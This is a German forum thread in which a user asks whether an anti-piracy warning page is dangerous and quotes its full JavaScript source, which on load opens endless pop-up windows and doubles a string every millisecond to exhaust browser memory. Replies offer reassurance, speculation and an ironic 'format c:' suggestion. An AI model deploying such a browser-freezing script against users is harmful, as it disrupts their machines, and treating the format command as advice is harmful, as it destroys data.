Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 14

Thema: ...gefährlich??

  1. #1
    hansi-fnr
    Gast

    Standard ...gefährlich??

    seas @ll, habe gestern mal ein bissal gesurft und bin auf folgendes gestoßen:

    http://www.chris-pc.com/pclock/index.html


    irgendwie kommen manche leute (freunde) wenn sie auf den oben genannten link klicken auf die seite:

    http://www.chris-tv.com/pirates.htm


    diese seite sagt wiederum das:

    Please do not PIRATE software!

    We are now taking appropriate actions against you .....


    naja, ich denk mir nix, weil erstens ich komm net auf die seite einfach so, und zweitens hab ich im quellcode der seite mal nachgeschaut und da steht folgendes:

    Code:
    <html>
    <head>
    <title>Please do not PIRATE software!</title>
    <script language="Javascript">
    function OpenWindow&#40;&#41;
    &#123;
     var iCounter = 0
     while &#40;true&#41;
      &#123;
       window.open&#40;"http&#58;//www.chris-tv.com/pirates.htm","PIRACY" + iCounter,"width=300,height=110,resizable=no"&#41;
       MemoryLoader&#40;&#41;
       iCounter++
      &#125;
    &#125;
    
    function WhileOpen&#40;&#41;
    &#123;
     while &#40;true&#41;&#123;&#125;
    &#125;
    
    var szMemorySize = "PIRACYREPORT" 
    
    function MemoryLoader&#40;&#41;
    &#123;
     szMemorySize = szMemorySize + szMemorySize
     window.setTimeout&#40;'MemoryLoader&#40;&#41;',1&#41;; 
    &#125;
    
    function ReloadIt&#40;&#41;
    &#123;
     history.go&#40;0&#41; 
     window.setTimeout&#40;'ReloadIt&#40;&#41;',1&#41; 
    &#125;
    
    function CloseWindow&#40;&#41; 
    &#123; 
     alert&#40;"You have been suspected of software PIRACY!"&#41; 
     window.close&#40;&#41; 
    &#125;
    </script>
    </head>
    
    <body bgcolor="#FFFFFF" onLoad="window.setTimeout&#40;'OpenWindow&#40;&#41;',1500&#41;" onUnLoad="CloseWindow&#40;&#41;">
    <table border="0" height="100%" width="100%">
      <tr>
        <td align="center"><font face="Tahoma,Verdana" color="#000000" size="4">Please do not PIRATE software!</font>
    <font face="Tahoma,Verdana" color="#000000" size="1">We are now taking appropriate actions against you .....</font></td>
      </tr>
    
    </table>
    </body>
    </html>
    ich kann daraus lesen dass das einfach nur ein POPUP script ist, das diese seite immer wieder öffnet, ich weiß das sogar, weil ich es ausprobiert habe, naja, für MICH is das jetzt nix gefährliches, aber es wäre nett wenn vllt jemand mal sein geschultes HTML auge drauf werfen kann und hier stellung nehmen kann.
    BITTE KEINE COMMENTS DIE NIX DAZU BEITRAGEN HIER EIN PAAR LEUTEN ZU HELFEN DIE JETZT SCHON EIN BISSAL AM ÜBERLEGEN SIND


    mFG hansi-fnr
    Achtung: Dies ist ein alter Thread im HTML und Webmaster Forum
    Diese Diskussion ist älter als 90 Tage. Die darin enthaltenen Informationen sind möglicherweise nicht mehr aktuell. Erstelle bitte zu deiner Frage ein neues Thema im Forum !!!!!

  2. #2
    Kaiser(in)
    Registriert seit
    09.12.2005
    Alter
    29
    Beiträge
    2.496
    Danke
    1
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    lösch die seite einfach, sieht aber nit so aus als wäre die gefährlich, achja, ich würde die pws ändern und sowas^^
    Sei immer du selbst. Außer du kannst Batman sein. Sei immer Batman!

  3. #3
    Forum Guru
    Registriert seit
    28.12.2004
    Ort
    Ringgenberg(bei Interlaken) / Schweiz
    Beiträge
    4.787
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    am besten ahlt software kaufen, dann währst du nämlich von alleine drauf gekommen das das ganze totaler schwachsinn ist.

    Und hättest dir keie nunötigen Sorgen gemacht.

  4. #4
    Meister(in)
    Registriert seit
    29.11.2004
    Beiträge
    277
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    ohje, das heißt gar nichts gutes,
    am besten
    format c: und ab die kirsche

  5. #5
    Forum Guru
    Registriert seit
    28.12.2004
    Ort
    Ringgenberg(bei Interlaken) / Schweiz
    Beiträge
    4.787
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Und womit begründest du deine Ausage ?!

  6. #6
    Meister(in)
    Registriert seit
    29.11.2004
    Beiträge
    277
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Zitat Zitat von GreenRover
    Und womit begründest du deine Ausage ?!
    Evtl mit Ironie?

  7. #7
    Gast

    Standard

    hmm, ich bin ja net der besitzer der seite, ich war da einfach drauf, hab den link weitergegeben aba anstatt auf den link zu kommen sind freunde auf die PIRATE.htm gekommen, vllt den source code auf der anderen seite anschauen?

    mFG hansi-fnr

  8. #8
    Forum Guru
    Registriert seit
    28.12.2004
    Ort
    Ringgenberg(bei Interlaken) / Schweiz
    Beiträge
    4.787
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    das kannst du wohl kaum im quelltext sehen, ich vermute dort mal eien serverseitige weiterleitung oder so.

    @ sibbiiii

    Ich zitiere:
    BITTE KEINE COMMENTS DIE NIX DAZU BEITRAGEN HIER EIN PAAR LEUTEN ZU HELFEN DIE JETZT SCHON EIN BISSAL AM ÜBERLEGEN SIND

  9. #9
    Meister(in)
    Registriert seit
    29.11.2004
    Beiträge
    277
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    oh, es tut mir ueberaus leid, das ich einen Unqualifizierten Beitrag abgegeben habe
    lieh... oÔ

  10. #10
    Fortgeschrittene/r
    Registriert seit
    03.08.2005
    Ort
    Bonn
    Beiträge
    176
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Der typ hat warscheinlich was mit php gemacht!
    IP-Adresse wohingeschickt oder sonst was!

    Bei mir (Firefox), hat sich mein browser alle fenster geschlossen als ich die besagte seite schließen wollte!??

    Warum???
    Auf alten Pferden lernt man reiten - Und auf jungen; gehst du kaputt! *g

Ähnliche Themen

  1. Aids - was macht das Virus so gefährlich?
    Von Starfighter im Forum Off Topic und Quasselbox
    Antworten: 16
    Letzter Beitrag: 08.05.2007, 23:46
  2. Ports freigeben wirklich so gefährlich?
    Von gelöschter User im Forum Computer - Internet Forum
    Antworten: 17
    Letzter Beitrag: 23.07.2005, 18:07

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •